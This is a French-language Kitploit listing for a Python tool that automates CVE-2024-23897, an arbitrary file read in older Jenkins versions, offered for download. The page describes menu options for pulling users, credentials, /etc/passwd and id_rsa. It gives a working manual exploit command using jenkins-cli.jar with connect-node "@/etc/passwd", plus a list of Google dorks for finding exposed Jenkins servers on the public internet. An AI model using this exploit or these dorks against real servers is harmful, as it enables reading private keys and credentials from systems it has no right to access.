Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-23897-Arbitrary-file-read — Un script réalisé en python pour automatiser la vulnérabilité CVE-2024-23897 | Kitploit
Outils/GitHubGitHub/pulentoski/cve-2024-23897-arbitrary-file-read
ReconnaissanceAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubpulentoski/cve-2024-23897-arbitrary-file-read

CVE-2024-23897-Arbitrary-file-read

Un script réalisé en python pour automatiser la vulnérabilité CVE-2024-23897

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Voir le dépôt
il y a 1 anPas encore vérifié
Partager

🤵🏻 CVE-2024-23897 Arbitrary-file-read 🤵🏻


Versions affectées :

  • Jenkins 2.441 et antérieures.
  • Jenkins LTS 2.426.2 et antérieures.

Un script réalisé en Python pour automatiser la vulnérabilité CVE-2024-23897 🤖 🛠️

Ce code Python présente un scanner pour une vulnérabilité spécifique (CVE-2024-23897) sur les serveurs Jenkins. Il commence par demander à l'utilisateur l'URL du serveur Jenkins.

Ensuite, il offre l'option de télécharger le fichier "jenkins-cli.jar" nécessaire pour interagir avec Jenkins depuis la ligne de commande. Après cela, il affiche un menu d'options qui inclut l'exécution de commandes telles que l'obtention d'informations sur le serveur, l'environnement, la configuration Jenkins, les utilisateurs, les identifiants, ainsi que la lecture de fichiers sensibles comme "/etc/passwd", "/etc/os-release" et "id_rsa".

Une fois qu'une option de menu est sélectionnée, la commande correspondante est exécutée sur le serveur Jenkins fourni. Le code est structuré avec des fonctions pour télécharger le fichier et exécuter les commandes, et une fonction principale pour gérer le flux du programme.

Exécution pour serveur Jenkins 📝 :

root@kitploit:~
python3 CVE-2024-23897-A-scaner.py 

exécution pour serveur Jenkins DANS DOCKER 📝 :

root@kitploit:~
python3  CVE-2024-23897-B-DOCKER-scaner.py
---------------------------------------------------------------------------------------------------------------------------------

exécution manuelle.

1- télécharger jenkins-cli.jar : http:///jnlpJars/jenkins-cli.jar

2- pour effectuer LFI, exécuter : java -jar jenkins-cli.jar -s http://172.17.0.2:8080/ -http connect-node "@/etc/passwd"


liste de dorks :

intitle:"Dashboard [Jenkins]" inurl:"/login"

intitle:"Jenkins" "Dashboard"

inurl:"/computer/" intitle:"Jenkins"

inurl:"/script" intitle:"Jenkins"

"Jenkins [Jenkins]" intitle:"Login"

intitle:"Jenkins" "Jenkins ver. 2.441"

inurl:"/manage" intitle:"Jenkins"

site:.com intitle:"Jenkins"

site:aws.amazon.com intitle:"Jenkins"

filetype:xml inurl:"jenkins/config.xml"

Télécharger l’outil